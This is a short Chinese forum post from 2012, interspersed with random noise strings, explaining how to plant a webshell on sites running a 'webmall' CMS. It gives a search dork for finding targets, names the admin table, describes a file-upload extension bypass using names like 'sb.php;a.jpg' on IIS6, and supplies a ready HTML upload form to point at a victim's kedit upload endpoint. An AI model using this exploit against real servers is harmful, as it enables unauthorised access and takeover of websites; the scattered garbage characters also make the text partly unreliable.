关键字:inurl:webmall/detail.php?id
( d7 m; H) _* f
+ m5 s, [5 w) _& b6 b9 i数据表:pwn_base_admin
, q. Z0 u/ b; W! \+ a( c s+ ? 4 G% |; m( V* w6 E
关于拿shell
$ u) f. u s" k$ C* Z9 \% j# A 4 {( r7 m' f! t* i8 y. V
首先登录后台admin.php- h7 E- o, O0 x' d" y
% N: o3 v* n0 [
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。# k+ e! `/ @# _* \; z4 a
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
# g/ {! u8 M+ ^5 O3 X1 F9 k; F然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的1 y8 ]5 I( A5 w7 C. M
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> 2 R% z1 \4 g* V9 z4 ?+ ?* @$ L8 @
<input type="text" name="fileName" value="sb.php;a.jpg" /> 6 n( F( N0 u( ~+ c2 @0 a8 {
<input type="hidden" name="attachPath" value="news/pics/" />
+ N. @1 T0 _0 g; J5 K; x<input type="file" name="fileData" size="14" /></td>
/ w/ z" x+ T" O* S7 C<input type="submit" name="button" value="确定" /> . @: C9 Y$ R1 o( }) g
</form>
/ M, f8 C6 x& X: f 1 m: J8 t0 ^: ?3 m2 g
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
+ d/ s) l8 F# y7 O) u8 Y+ \. p. P
|
发表于 2012-11-9 20:52:15
收藏
支持
反对